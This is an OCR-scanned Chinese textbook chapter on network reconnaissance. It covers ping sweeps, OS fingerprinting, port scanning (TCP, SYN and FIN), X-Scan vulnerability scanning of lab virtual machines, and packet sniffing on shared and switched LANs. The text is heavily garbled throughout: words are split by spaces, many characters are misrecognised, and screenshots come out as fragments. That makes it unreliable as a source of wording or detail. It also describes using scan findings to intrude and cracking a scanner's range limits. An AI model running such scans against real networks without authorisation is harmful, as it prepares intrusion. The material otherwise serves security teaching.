发 现 的 缺陷 越 多 


搜集 的 信息 越 多 


图 $-1 信息 搜集 


在 攻击 者 对 特定 的 网 络 资源 进行 攻击 之 前 ， 他 们 需要 了 解 将 要 攻击 的 环境 ， 这 需要 搜 
集 汇 总 各 种 和 目标 系统 相关 的 信息 ， 包 括 机 器 数目 、 类 型 、 操 作 系统 等 。 


克 乡 作 会 英 大 理论 与 笑 践 


S.1.2 ”信息 搜集 的 种 类 

1. 网 络 扫描 一 一 主动 的 信息 搜集 

网 络 扫描 是 采用 模拟 攻击 的 形式 对 目标 可 能 存在 的 已 知 安全 漏洞 逐 项 进行 检查 ， 目 标 
可 以 是 工作 站 、 服 务 器 、 交 换 机 、 路 由 器 、 数 据 库 等 对 象 。 根 据 扫描 结果 向 扫描 者 提供 周 


密 可 靠 的 分 析 服务 。 
2， 网 络 监 被 动 的 信息 搜集 


网 络 监听 是 利用 监听 工具 , 监视 网 络 的 状态 、 数 据 的 流动 或 者 网 络 上 传输 的 敏感 信息 。 
监听 效果 最 好 的 地 方 是 网 关 、 路 由 器 、 防 火 墙 之 类 信息 聚焦 的 设备 处 。 


5.2 网 络 扫 描 


安全 扫描 技术 是 一 类 重要 的 网 络 安 全 技术 。 扫 描 本 身 不 算 一 种 攻击 行为 ， 但 是 它 常常 
可 以 成 为 攻击 发 起 前 的 准备 工作 。 扫 描 器 能 够 自动 检测 远程 或 本 地 主机 的 安全 性 弱点 ， 发 
现 远 程 服务 器 各 种 TCP 端口 的 分 配 、 提 供 的 服务 及 相应 的 软件 版 本 , 记录 目标 给 予 的 回答 ， 
搜集 关于 目标 主机 的 各 种 有 用 信息 。 扫 描 器 可 以 帮助 发 现 目标 主机 存在 的 一 些 问 题 ， 而 这 
些 问题 可 能 恰恰 就 是 黑客 攻击 的 关键 点 。 

反之 ， 网 络 管理 人 员 同 样 可 以 利用 安全 扫描 技术 与 防火 墙 、 入 侵 检测 系统 互相 配合 ， 
有 效 提 高 网 络 的 安全 性 。 通 过 对 网 络 的 扫描 ， 网 络 管理 员 可 以 了 解 网 络 的 安全 配置 和 运行 
的 应 用 服务 ， 及 时 发 现 安全 漏洞 ， 客 观 评价 网 络 风 险 等 级 。 网 络 管理 员 可 以 根据 扫描 的 结 
果 更 正 网 络 安全 漏洞 和 系统 中 的 错误 配置 ， 在 黑客 攻击 前 进行 防范 。 如 果 说 防火 墙 和 网 络 
监控 系统 是 被 动 的 防御 手段 ， 那 么 安全 扫描 就 是 一 种 主动 的 防范 措施 ， 可 以 有 效 避 免 黑 客 
攻击 行为 ， 做 到 防 患 于 未 然 。 


5.2.1 安全 扫描 技术 分 类 


1. 主机 安全 扫描 技术 

主机 安全 扫描 技术 是 采用 被 动 式 扫 描 策略 的 ， 它 基于 主机 之 上 ， 对 系统 中 不 合适 的 设 
置 ， 脆 弱 的 口令 以 及 其 他 同安 全 规则 抵触 的 对 象 进行 检查 。 

2. 网 络 安全 扫描 技术 

网 络 安全 扫描 技术 是 采用 主动 式 扫描 策略 的 ， 它 基于 网 络 之 上 ， 通 过 执行 一 些 脚本 文 
件 ， 模 拟 对 系统 进行 攻击 的 行为 ， 并 记录 系统 的 反应 ， 从 而 发 现 其 中 的 漏洞 。 


5.2.2 ”网 络 安全 扫描 的 步骤 


一 次 完整 的 网 络 安全 扫描 分 为 三 个 阶段 。 

(1) 第 一 阶段 : 发 现 目标 主机 或 网 络 。 

(2) 第 二 阶段 : 发 现 目标 后 进一步 搜集 目标 信息 ， 包 括 操作 系统 类 型 、 运 行 的 服务 及 
服务 软件 的 版 本 等 。 如 果 目 标 是 一 个 网 络 ， 还 可 以 进一步 发 现 该 网 络 的 拓扑 结构 、 路 由 设 
备 以 及 各 主机 的 信息 。 


(3) 第 三 阶段 ; 根据 搜集 到 的 信息 判断 或 者 进一步 测试 系统 是 否 存在 安全 漏洞 。 
网 络 安全 扫描 技术 包括 : PING 扫射 、 操 作 系统 探测 、 端 口 扫 描 以 及 漏洞 扫描 等 。 这 
些 技术 在 网 络 安全 扫描 的 三 个 阶段 中 各 有 体现 。 


S.2.3 PING 扫射 技术 


PING 扫射 用 于 网 络 安全 扫描 的 第 一 阶段 ， 可 以 帮助 我 们 识别 系统 是 否 处 于 活动 状态 。 
攻击 者 想 知道 哪些 机 器 是 活动 的 ， 哪 些 不 是 ， 公 司 里 一 天 中 不 同 的 时 间 有 不 同 的 机 器 在 活 
动 。 一 般 攻击 者 在 白天 寻找 活动 的 机 器 ， 然 后 在 深夜 再 次 查找 ， 这 样 就 能 区 分 工作 站 和 服 
务 器 。 

例 S-1 使 用 PING 扫射 软件 探测 活动 主机 。 

使 用 工具 软件 Quickping， 该 软件 主要 功能 如 下 。 

(1) 扫描 活动 主机 下 。 

(2) 探测 出 网 卡 地 址 。 

(3) 探测 出 主机 名 。 

该 软件 是 绿色 软件 ， 完 全 的 图 形 化 界面 ， 使 用 非常 简单 ， 主 界面 如 图 5-2 所 示 。 
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68 69 70 71 72 73 74 

84 85 86 87 88 89 90 
100 101 102 103 104 105 106 107 108 109 110 111 
112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 
128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 
144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 
160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 
176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 
192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 
208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 
224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 
240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 


响应 数 : 


图 5-2 PING 扫射 主 界面 


在 耳 地 址 范围 中 输入 192.168.8.0 一 192.168.8.255， 单 击 开 始 ， 可 以 扫描 出 活动 主机 ， 
绿色 代表 开机 ， 深 绿色 代表 开机 但 基本 信息 没有 扫描 全 。 扫 描 结 果 如 图 5-3 所 示 ， 其 中 第 
192.168.8.112 为 真实 机 卫 ，192.168.8.212 为 虚拟 机 IP。 


地 on 


同和 缘 条 档 与 网 经 监听 


爷 妆 会 巩 痰 理论 与 完 三 


图 5-3 扫描 结果 
单 击 精简 结果 ， 可 以 查看 扫描 出 的 活动 主机 的 网 卡 地 址 及 主机 名 ， 如 图 5-4 所 示 。 


52.168.8 1 才 
(92. 168. 8. 212 & 


扫描 真实 机 结果 


扫描 虚拟 机 结果 


1 图 
10:41:09 终止 : 10:41:34 用 时 : 0:00:25 ”响应 数 : 2 


图 5-4 精简 结果 


5.2.4 操作 系统 探测 技术 


操作 系统 探测 技术 用 于 网 络 安全 扫描 的 第 二 阶段 ， 攻 击 者 知道 哪些 机 器 是 活动 的 ， 下 


一 步 是 要 识别 每 台 主 机 运行 哪 种 操作 系统 ， 因 为 对 于 不 同类 型 的 操作 系统 ， 其 上 的 系统 漏 
洞 有 很 大 区 别 ， 所 以 攻击 的 方法 也 完全 不 同 ， 甚 至 同一 种 操作 系统 的 不 同 版 本 的 系统 漏洞 
也 是 不 一 样 的 。 

操作 系统 探测 技术 的 原理 是 根据 不 同 的 操作 系统 在 网 络 底层 协议 的 各 种 实现 细节 上 
略 有 不 同 ， 扫 描 程序 通过 向 远程 主机 发 送 不 平常 的 或 者 没有 意义 的 数据 包 来 完成 ， 因 为 这 
些 数据 包 RFC 在 intemet 标准 中 没有 列 出 ， 每 个 操作 系统 对 它们 的 处 理 方法 不 同 ， 扫 描 程 
序 通 过 解析 输出 ， 能 够 弄 清 自己 正在 访问 的 设备 运行 的 是 何 种 操作 系统 。 

例 $-2 探测 活动 主机 的 操作 系统 。 

使 用 工具 软件 LanHelper 可 以 探测 出 目标 计算 机 使 用 的 操作 系统 ， 主 界面 如 图 5-5 
所 示 。 


File Edt yiew (Qetwor) Tools NT-Utilties Help 


| 怠 - 晶 区 | 阶 -办 难 古 | 章 - 玉 口 加 忆 呈 


选择 Network 菜单 中 的 Scan IP， 
输入 目标 主机 的 他 地 址 


lomo 1 | 6 


图 5-5 操作 系统 探测 主 界面 


选择 Network 菜单 中 的 Scan IP, 输入 192.168.8.212 (虚拟 机 卫 地 址 ), 单 击 Start Scan， 
开始 进行 扫描 。 扫 描 结 果 如 图 5-6 所 示 ， 可 以 探测 出 虚拟 机 操作 系统 ， 同 时 可 以 探测 出 一 
些 其 他 系统 信息 。 


Ele Edit Wiew Network Tools NT-Utiities Help 


| 已: 日 区 | 办 -办 谷 车 | 轩 - 芳 回回 名 号 


加 AD5ERVER alve 192.168.8.212 (Win2000) Maste ADMINg: C$: IPC 


探测 出 虚拟 机 操作 系统 为 Win2000 


到 
ltemls}: 1 [0#0] Scanned groups: 2, machines: 1 Scan finishe 才 


图 5-6 操作 系统 探测 结果 
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同 缘 条 楷 与 网 经 履 听 


同和 经 颁 会 扩大 理论 与 笑 嘴 


5.2.5 ”端口 扫描 技术 


端口 扫描 技术 同样 用 于 网 络 安全 扫描 的 第 二 阶段 ， 端 口 扫 描 是 通过 与 目标 系统 的 
TCP/IP 端口 连接 ， 查 看 该 系统 处 于 监听 或 运行 状态 的 服务 。 

端口 扫描 也 是 一 种 获取 主机 信息 的 有 效 方法 。 在 UNIX/Linux 系统 中 ， 任 何 用 户 均 可 
使 用 端口 扫描 程序 而 不 需要 root 权限 。 从 扫描 的 端口 数目 和 端口 号 也 可 以 判断 出 目标 主机 
运行 的 操作 系统 ， 通 过 收集 扫描 的 信息 ， 也 能 够 轻松 地 掌握 局 域 网 络 的 构造 。 表 5-1 所 示 
为 一 些 常用 端口 号 和 对 应 服务 的 对 照 表 ， 不 过 应 该 认识 到 ， 这 种 对 应 仅仅 是 约定 ， 特 别 是 
对 于 高 于 1024 的 端口 ， 并 没有 严格 的 规范 进行 约束 。 

1. 端口 分 类 

(1) 熟知 端口 号 : 由 因特网 指派 名 字 和 号 码 公 司 负 责 分 配给 一 些 常用 的 应 用 层 程序 固 
定 使 用 ， 其 数值 一 般 为 0 至 1023。 

(2) 一 般 端口 号 : 用 来 随时 分 配给 请 求 通信 的 客户 进程 。 

表 5-1 常用 服务 端口 对 照 表 


服务 端口 服务 端口 
socks 1080/tcp wins 1512/tep 
socks 1080/udp nfs 2049/tcp 
mysql 3306/tcp 2049/udp 
3306/udp gopher 70/tcp 
netstat 1S/tcp 70/udp 
linuxconf 98/tcp finger 79/tcp 
Indc 953/tcp 79/udp 
953/udp http 80/tcp 
squid 3128/tcp 80/udp 
ftp 21l/tcp pop3 110/tcp 
21/udp ll0/udp 
ssh 22/tcp imap 143/tcp 
22/udp 143/udp 
telnet 23/tcp ldap 389/tcp 
23/udp 389/udp 
smtp 25/tcp rtsp 544/udp 
25/udp shell 514/tcp 
nameserver 42/tcp Syslog S514/udp 
42/udp uucp 540/tcp 


2. 端口 扫描 原理 

入 侵 者 如 果 想 要 探测 目标 计算 机 开放 了 哪些 端口 ， 提 供 了 哪些 服务 ， 就 需要 先 与 目标 
端口 建立 TCP 连接 ， 这 也 就 是 扫描 的 出 发 点 。 尝试 与 目标 主机 的 某 些 端口 建立 连接 ， 如 果 
目标 主机 该 端口 有 回复 ( 即 三 次 握手 中 的 第 二 次 )， 则 说 明 该 端口 开放 ， 即 为 “活动 端口 ”。 

3. 端口 扫描 原理 分 类 

端口 扫描 原理 分 为 三 类 ， 如 图 5-7 所 示 ， 分 别 为 全 连接 扫描 、 半 连接 扫描 以 及 无 连接 
扫描 。 


全 连接 扫描 ( TCP ) 
端 
由 半 连 接 扫描 ( SYN ) 
扫 
描 

无 连接 扫描 ( FIN ) 


图 5-7 端口 扫描 原理 分 类 


(1) 全 连接 扫描 (TCP 扫描 ): 这 种 扫描 方法 使 用 三 次 握手 ， 与 目标 计算 机 建立 标准 
的 TCP 连接 ， 也 就 是 ， 向 对 方 发 送 一 个 正常 的 TCP 连接 请 求 ， 如 果 存 在 三 次 握手 ， 证 明 
存在 。 

(2) 半 连 接 扫 描 (SYN 扫描 ): 车 端口 扫描 没有 完成 一 个 完整 的 TCP 连接 ， 扫 描 主 机 
向 目标 计算 机 的 指定 端口 发 送 SYN 数据 段 ， 表 示 发 送 建立 连接 请 求 。 

@ 如 果 目 标 计算 机 的 回应 TCP 报 文中 SYN=1，ACK=1， 则 说 明 该 端口 是 活动 的 ， 接 
着 扫描 主机 传送 一 个 RST 给 目标 主机 拒绝 建立 TCP 连接 ， 从 而 导致 三 次 握手 过 程 的 失败 。 
也 就 是 说 ， 建 立 连 接 时 候 只 完成 了 前 两 次 握手 。 

@ 如 果 目 标 计算 机 回应 的 是 RST， 则 表示 该 端口 为 “ 死 端口 ”， 这 种 情况 下 ， 扫 描 主 
机 不 用 做 任何 回应 。 

(3) 无 连接 扫描 FIN 扫描): 依靠 发 送 FIN 来 判断 目标 计算 机 的 指定 端口 是 否 活动 。 
发 送 一 个 FIN=1 的 TCP 报 文 到 一 个 关闭 的 端口 时 ， 该 报 文 会 被 丢掉 ， 并 返回 一 个 RST 报 
文 。 但 是 ， 如 果 当 FIN 报 文 到 一 个 活动 的 端口 时 ， 该 报 文 只 是 简单 地 丢掉 ， 不 会 返回 任何 
回应 。 从 FIN 扫描 可 以 看 出 ， 这 种 扫描 没有 涉及 任何 TCP 连接 部 分 ， 因 此 ， 这 种 扫描 比 前 
两 种 都 安全 ， 可 以 称 之 为 秘密 扫描 。 

例 5-3 端口 扫描 。 

得 知 对 方 开 放 了 哪些 端口 也 是 扫描 的 重要 一 步 ， 使 用 工作 软件 PortScan 可 以 得 到 对 方 
计算 机 开放 的 端口 ， 主 界面 如 图 5-8 所 示 。 

对 192.168.8.112( 真 实 机 〉 的 计算 机 进行 端口 扫描 ， 在 Scan 文本 框 中 输入 IP 地 址 或 
者 主机 名 ， 单 击 按钮 START， 开 始 扫描 ， 如 图 5-9 所 示 。 
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网 经 妇 抽 与 网 办 败 听 


克 参 颁 会 扩大 理论 与 筑 夏 


输入 IP 地 址 或 者 主机 名 


Filename:|C:\SPHERE\DOCSSCANLOG.TXT 


图 5-8 ”端口 扫描 主 界面 


Sean: [192.168.8.112 START | 
Send Port: [6178 Recv Port: [2383 


Stop Port: [65536 Delay (MS): |20 SAVE 


1 Quick scan 三 
Ag | 
|Y 4 Seroll 


139 :CLOSED 
445 :CLOSED 


2383 :CLOSED 
912 :CLOSED 
:CLOSED 
1433 :CLOSED 
0 :SCAN HALTED ON PORT:6178 


图 5-9 ”端口 扫描 结果 


5.2.6 汤 洞 扫描 技术 


网 络 安全 扫描 的 第 三 阶段 采用 的 漏洞 扫描 通常 是 在 端口 扫描 的 基础 上 ， 对 得 到 的 信息 
进行 相关 处 理 ， 进 而 检测 出 目标 系统 存在 的 安全 漏洞 。 

漏洞 扫描 主要 通过 以 下 两 种 方法 来 检查 目标 主机 是 否 存在 漏洞 : 

(1) 在 端口 扫描 后 得 知 目标 主机 开启 的 端口 以 及 端口 上 的 网 络 服务 ， 将 这 些 相关 信息 
与 网 络 漏洞 扫描 系统 提供 的 漏洞 库 进 行 匹 配 ， 查 看 是 否 有 满足 匹配 条 件 的 漏洞 存在 。 

(2) 通过 模拟 黑客 的 攻击 手法 ， 对 目标 主机 系统 进行 攻击 性 的 安全 漏洞 扫描 ， 如 测试 
弱 口 令 等 ， 若 模拟 攻击 成 功 ， 则 表明 目标 主机 系统 存在 安全 漏洞 。 

例 5-4 漏洞 扫描 。 

可 使 用 工具 软件 X-Scan 进行 漏洞 扫描 ， 该 软件 采用 多 线程 方式 对 指定 IP 地 址 段 (或 
单机 ) 进行 安全 漏洞 检测 ， 支 持 插件 功能 ， 提 供 图 形 界面 和 命令 行 两 种 操作 方式 ， 扫 描 内 
容 包括 远程 操作 系统 类 型 及 版 本 、 标 准 端口 状态 及 端口 Banner 信息 、SNMP 信息 、CGI 
漏洞 、IIS 漏洞 、RPC 漏洞 、 弱 口令 用 户 、 注 册 表 信 息 等 。 扫 描 结 果 保 存在 /log/ 目 录 中 ， 
index_*.htm 为 扫描 结果 索引 文件 。X-Scan 工具 软件 的 主 界面 如 图 5-10 所 示 。 


文件 (V) 设置 (W) 前 看 (X) 工具 (Y) Language ”帮助 (加 
@| Pume| 加 | 国 洛 | 回 
普通 信息 | 据 洞 信息 | 错误 信息 | 
用 x-sean-v3.3 使 用 说 明 


一 ， 系 统 要 求 : Windows 机 /20007XP/2003 
理论 上 可 运行 于 Yinaows 三 系列 操作 系统 ， 推 荐 运行 于 Windows 2000 以 上 的 server 版 inaows 系 统 。 


pe i | 


图 5-10 ”漏洞 扫描 主 界面 


可 以 利用 该 软件 对 系统 存在 的 一 些 漏洞 进行 扫描 , 选择 菜单 栏 “设置 ?下 的 菜单 项 “ 扫 
描 参 数 ” 扫描 参数 的 设置 如 图 5-11 所 示 。 

可 以 看 出 该 软件 可 以 对 常用 的 网 络 及 系统 的 漏洞 进行 全 面 扫描 。 选 中 其 中 几 个 复 选 
框 ， 单 击 “确定 ”按钮 。 下 面 需 要 确定 要 扫描 的 主机 人 P 地 址 或 者 IP 地 址 段 ， 选 择 菜 单 栏 
“设置 ”下 的 菜单 项 “扫描 参数 ”, 扫描 一 台 主 机 , 在 指定 卫 范围 中 输入 : 192.168.8.212 ( 虚 
拟 机 下)， 如 图 5-12 所 示 。 

设置 完毕 后 ， 进 行 漏洞 扫描 ， 单 击 工具 栏 上 的 图 标 “ 开 始 ” 对 目标 主机 进行 扫描 ， 如 
图 5-13 所 示 。 
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本 : 冰 二 
| 

半 

恤 


图 5-11 扫描 参数 设置 


指定 J 区 国 


二 
| 


厂 从 文件 宁 了 主机 列表 设置 扫描 的 人 地址 


图 5-12 设置 扫描 的 地 址 


"102 168 .8.212 


Actve/mamum hos threac: 1110, curentamum thread: 9j100, Tme(s): 53 


图 5-13 ”开始 扫描 


扫描 需要 经 过 一 段 比较 长 的 时 间 ， 最 终 扫 描 结 果 如 图 5-14 所 示 。 


主机 地 址 ”端口 /服务 服务 漏洞 

192,168.8,212 |netbios-ssn (139jtcp) 发 现 安全 漏洞 
192.168.8.212 |https (443jtcp) 发 现 安全 提示 
192,168.8,212 |microsoft-ds (445jtcp) 发 现 安全 提示 
192.168.8.212 |NNTP-ss| (563jtcp) 发 现 安全 提示 
192.168.8.212 ”|domain (53jtcp) 发 现 安全 提示 
192.168.8,212 lepmap (135/jtcp) 发 现 安全 提示 
192.168.8.212 1 发 现 安全 提示 
192.168.8.212 junknown (1027/tcp) 发 现 安全 提示 
192,168,8,212 |smtp (25jtcp) 发 现 安全 提示 
192,168.8,212 http (80jtcp) 发 现 安全 提示 
192.168,8.212 nntp (119jtep) 发 现 安全 提示 
192,168.8,212 |ftp (zljtcp) 发 现 安全 提示 
192,168,8,212 ee 5ervices | 发 现 安全 提示 


图 5-14 漏洞 扫描 结果 


结果 显示 发 现 了 许多 系统 漏洞 ， 可 以 利用 这 些 漏洞 实施 系统 入 侵 ， 后 面 的 章节 将 介绍 
使 用 这 些 漏洞 实现 攻击 。 

除了 以 上 案例 中 介绍 的 这 些 扫描 工具 软件 以 外 ， 比 较 著 名 的 工具 软件 还 有 很 多 ， 例 如 
扫描 经 典 工具 “流光 ” 流光 也 是 非常 优秀 的 扫描 工具 之 一 ， 它 是 由 国内 高 手 小 榕 精心 打造 
的 综合 扫描 器 ， 功 能 非常 强大 ， 不 仅 能 完成 各 种 扫描 任务 ， 而 且 自 带 了 许多 猜 解 器 和 入 侵 
工具 。 与 X-Scan 相 比 , 流光 的 功能 多 一 些 , 但 操作 起 来 比较 复杂 ， 由 于 流光 的 功能 过 于 强 
大 ,而且 功能 还 在 不 断 扩充 中 ， 因 此 流光 的 作者 限制 了 流光 所 能 扫描 的 下 范围, 不 允许 流 
光 扫 描 国 内 IP 地址 。 但是， 入 侵 者 为 了 能 够 最 大 限度 地 使 用 流光 ， 在 使 用 流光 之 前 ， 都 需 
要 用 专门 的 破解 程序 对 流光 进行 破解 ， 去 除 他 范围 和 功能 上 的 限制 。 


5.3 网 络 监 昕 


网 络 监听 原本 是 网 络 管理 员 使 用 一 类 管理 工具 ， 监 视 网 络 的 状态 、 数 据 的 流动 ， 以 及 
网 络 上 传输 的 信息 。 但 是 网 络 监听 工具 也 是 黑客 们 常用 的 工具 ， 当 信息 以 明文 的 形式 在 网 
络 上 传输 时 ， 便 可 以 使 用 网 络 监听 的 方式 来 获得 网 络 上 传输 的 敏感 信息 。 网 络 监听 可 以 在 
网 上 的 任何 一 个 位 置 实施 , 如 局 域 网 中 的 一 台 主 机 、 网 关上 或 远程 网 的 调制 解 调 器 之 间 等 。 


S.3.1 监听 原理 
所 谓 “ 监 听 ” 技 术 ， 就 是 在 互相 通信 的 两 台 计算 机 之 间 通 过 技术 手段 插入 一 台 可 以 接 
收 并 记录 通信 内 容 的 设备 ， 最 终 实现 对 通信 双方 的 数据 记录 。 例如， 如 图 5-15 所 示 ， 在 通 


信 主 机 A 和 通信 主机 B 之 间 , 通过 技术 手段 插入 一 台 监 听 设 备 ， 即 可 实现 监听 。 但 大 家 需 
要 注意 的 是 :一 般 都 要 求 用 做 监听 途径 的 设备 不 能 造成 通信 双方 的 行为 异常 或 连接 中 断 等 ， 
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就 是 说 ， 监 听 方 不 能 参与 通信 中 任何 一 方 的 通信 行为 ， 仅 仅 是 “被 动 ” 地 接收 记录 通信 数 
据 而 不 能 对 其 进行 自 改 ， 一 旦 监听 方 违反 这 个 要 求 ， 这 次 行为 就 不 是 “监听 ”而 是 “ 动 


S$ 9 s 


主机 A 监听 设备 主机 B 
图 $-15 ”监听 技术 原理 
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不 同 数据 链 路 上 传输 的 信息 被 监听 的 可 能 性 如 下 。 

1. 以 太 网 

以 太 网 是 一 个 广播 型 的 网 络 ， 其 工作 方式 是 : 将 要 发 送 的 数据 包 发 送 连接 在 一 起 的 所 
有 主机 ， 包 中 包含 着 应 该 接收 数据 包 主机 的 正确 地 址 ， 只 有 与 数据 包 中 目标 地 址 一 致 的 那 
台 主 机 才能 接收 。 但 是 ， 当 主机 工作 在 监听 模式 下 ， 无 论 数据 包 中 的 目标 地 址 是 什么 ， 主 
机 都 将 接收 。 

2. FDDI、 Token-ring 

尽管 令 牌 网 并 不 是 一 个 广播 型 网 络 ， 但 带 有 令 牌 的 那些 包 在 传输 过 程 中 ， 平 均 要 经 过 
网 络 上 一 半 的 计算 机 ， 高 的 数据 传输 率 使 监听 变 得 比较 困难 。 

3. 电话 线 

电话 线 可 以 被 一 些 电话 公司 协作 人 或 者 一 些 有 机 会 在 物理 上 访问 到 线路 的 人 搭 线 窃 
听 。 在 微波 线路 上 的 信息 也 会 被 截获 ， 在 实际 中 ， 高 速 的 调制 解 调 器 将 比 低速 的 调制 解 调 
器 搭 线 窃听 困难 一 些 ， 因 为 高 速 调制 解 调 器 中 引入 了 许多 频率 。 

4. IP 通过 有 线 电视 信道 

许多 已 经 开发 出 来 的 ， 使 用 有 线 电视 信道 发 送 IP 数据 包 的 系统 依靠 RF 调制 解 调 器 。 
RF 使 用 一 个 TV 通道 用 于 上 行 和 下 行 。 在 这 些 线路 上 传输 的 信息 没有 加 密 ， 因 此 ， 可 以 被 
一 些 可 以 从 物理 上 访问 到 TV 电缆 的 用 户 截获 。 

$5. 微波 和 无 线 电 

无 线 电 本 来 就 是 一 个 广播 型 的 传输 媒介 ， 任 何 有 一 个 无 线 电 接 收 机 的 人 都 可 以 截获 那 
些 传输 的 信息 。 


S.3.2 ”监听 实现 条 件 


实现 监听 ， 它 要 求 监听 设备 的 物理 传输 介质 与 被 监听 设备 的 物理 传输 介质 存在 直接 联 
系 或 者 数据 包 能 经 过 路 由 选择 到 达 对 方 ， 即 一 个 逻辑 上 的 三 方 连 接 。 

能 实现 这 个 条 件 的 有 以 下 情况 : 

(1) 监听 方 与 通信 方 是 位 于 同一 物理 网 络 的 ， 如 局 域 网 ; 

(2) 监听 方 与 通信 方 存在 路 由 或 接口 关系 ， 例 如 通信 双方 的 同一 网 关 等 。 

对 于 一 个 进行 网 络 攻击 的 黑客 来 说 ， 能 攻破 网 关 、 路 由 器 和 防火 墙 的 情况 极为 少见 ， 
完全 可 以 由 安全 管理 员 安 装 一 些 设备 ， 对 网 络 进行 监控 ， 或 者 使 用 一 些 专门 设备 ， 运 行 专 


门 的 监听 软件 ， 并 防止 任何 非法 访问 。 对 于 一 台 连 网 的 计算 机 ， 最 方便 的 是 在 局 域 网 中 进 
行 监听 ， 只 需 安 装 一 个 监听 软件 ， 然 后 就 可 以 坐 在 机 器 旁 浏览 监听 到 的 信息 了 。 


5.3.3 ”共享 式 局 域 网 内 的 监听 


1. 什么 是 共享 式 局 域 网 

所 谓 的 “共享 式 ” 局 域 网 ， 指 的 是 早期 采用 集线器 HUB 作为 网 络 连接 设备 的 传统 局 
域 网 的 结构 ， 如 图 5-16 所 示 。 在 这 个 结构 里 ， 所 有 机 器 都 是 共享 同一 条 传输 线路 的 ， 集 线 
器 没有 端口 的 概念 ， 它 的 数据 发 送 方式 是 “广播 >， 集 线 器 接收 到 相应 数据 时 是 单纯 地 把 数 
据 往 它 所 连接 的 每 一 台 设 备 线路 上 发 送 的 。 
主机 A ”主机 B 主机 C 


图 5-16 ”共享 式 局 域 网 


2， 共享 式 局 域 网 工作 过 程 

共享 式 局 域 网 协议 的 工作 方式 是 将 要 发 送 的 数据 包 发 往 连接 在 一 起 的 所 有 主机 ， 在 包 
头 中 包括 着 应 该 接收 数据 包 的 主机 的 正确 地 址 。 在 共享 式 局 域 网 中 ， 填 写 了 物理 地 址 的 帧 
从 网 络 接口 也 就 是 从 网 卡 中 发 送出 去 ， 传 送 到 物理 的 线路 上 ， 当 发 送出 去 的 信号 到 达 集 线 
器 ， 由 集线器 再 发 向 连接 在 集线器 上 的 每 一 条 线路 ， 于 是 ， 在 物理 线路 传输 的 数字 信和 号 
就 到 达 了 连接 在 集线器 上 的 每 一 台 主机 。 数 字 信 号 到 达 一 台 主机 的 网 络 接口 时 ， 在 正常 情 
况 下 ， 网 络 接口 读 入 数据 帧 ， 然 后 进行 检查 ， 如 果 数 据 帧 中 携带 的 物理 地 址 是 自己 的 ， 或 
者 物理 地 址 是 广播 地 址 ， 将 由 数据 帧 交 给 上 层 协 议 软件 ， 也 就 是 瑟 层 软件 ， 也 就 是 说 ， 只 
有 与 数据 包 中 目标 地 址 一 致 的 那 台 主机 才能 接收 数据 包 ， 和 否则 就 将 这 个 帧 丢弃 。 对 于 每 一 
个 到 达 网 络 接口 的 数据 帧 ， 都 要 进行 这 个 过 程 。 例 如 ， 在 图 5-16 中 ， 主 机 A 发 送 一 条 报 
文 给 主机 B， 所 有 连接 在 这 个 局 域 网 中 的 计算 机 都 会 收 到 这 条 报 文 ， 但 是 只 有 主机 B 才 会 
接收 处 理 这 条 报 文 ， 而 其 他 计算 机 则 会 抛弃 该 报 文 。 

3 共享 式 局 域 网 监听 的 实现 

当主 机 工作 在 监听 模式 下 ， 主 机 收 到 的 所 有 的 数据 帧 都 将 交 给 上 层 协议 软件 处 理 ， 也 
就 是 说 ， 主 机 A 发 送 报 文 给 主机 B， 主 机 C、D、E 都 接收 该 报 文 ， 不 丢弃 报 文 。 所 以 说 ， 
共享 式 局 域 网 结构 里 的 数据 实际 上 是 没有 隐私 性 的 ， 我 们 希望 网 卡 会 丢弃 与 自己 无 关 的 报 
文 ， 但 实际 上 它 可 以 不 丢弃 ， 只 需要 调整 网 卡 ( 网 络 接口 ) 的 工作 模式 为 混杂 模式 。 

每 块 网 卡 基本 上 都 会 有 以 下 4 种 工作 模式 。 
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(1) 广播 方式 Broadcast: 该 模式 下 的 网 卡 能 够 接收 网 络 中 的 广播 信息 。 

(2) 组 播 方式 Multicast: 设置 在 该 模式 下 的 网 卡 能 够 接收 组 播 数据 。 

(3) 直接 方式 Unicast: 在 这 种 模式 下 ， 只 有 目的 网 卡 才 能 接收 该 数据 。 

(4) 混杂 模式 Promiscuous: 在 这 种 模式 下 的 网 卡 能 够 接收 一 切 通过 它 的 数据 ， 而 不 管 
该 数据 是 否 是 传 给 它 的 。 

在 混杂 模式 里 ， 网 卡 对 报 文中 的 目标 MAC 地 址 不 加 任何 检查 而 全 部 接收 ， 这 样 就 造 
成 无 论 什 么 数据 ， 只 要 是 路 过 的 都 会 被 网 卡 接收 的 局 面 ， 监 听 就 是 从 这 里 开始 的 。 


5.3.4 交换 式 局 域 网 内 的 监听 

1. 什么 是 交换 式 局 域 网 

作为 与 “共享 式 ”相对 的 “交换 式 ”局 域 网 ， 它 的 网 络 连 接 设备 被 换 成 了 交换 机 ， 如 
图 5-17 所 示 。 交 换 机 引入 了 “端口 ”的 概念 ， 它 会 产生 一 个 地 址 表 用 于 存放 每 台 与 之 连接 
的 计算 机 的 MAC 地址， 从 此 每 个 网 络 接口 便 作为 一 个 独立 的 端口 存在 。 
主机 A ”主机 B 主机 C 
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主机 D 主机 E 
图 5-17 交换 式 局 域 网 


2. 交换 式 局 域 网 工作 过 程 

在 交换 式 局 域 网 中 ， 除 了 声明 为 广播 或 组 播 的 报 文 ， 交 换 机 在 一 般 情况 下 是 不 会 让 其 
他 报 文 出 现 类 似 共享 式 局 域 网 那样 的 广播 形式 发 送行 为 的 , 这 样 即使 网 卡 设置 为 混杂 模式 ， 
它 也 收 不 到 发 往 其 他 计算 机 的 数据 ， 因 为 数据 的 目标 地 址 会 在 交换 机 中 被 识别 ， 然 后 有 针 
对 性 地 发 往 表 中 对 应 地 址 的 端口 。 例 如 , 在 图 5-17 中 , 主机 A 发 送 一 条 报 文 给 主机 B， 主 
机 A 首先 将 报 文 发 送 给 交换 机 ， 交 换 机 会 查看 报 文中 的 目标 地 址 ， 然 后 交换 机 查找 自己 的 
交换 表 ， 根 据 目 标 地 址 与 端口 的 对 应 关系 ， 直 接 将 报 文 发 送 给 主机 B。 

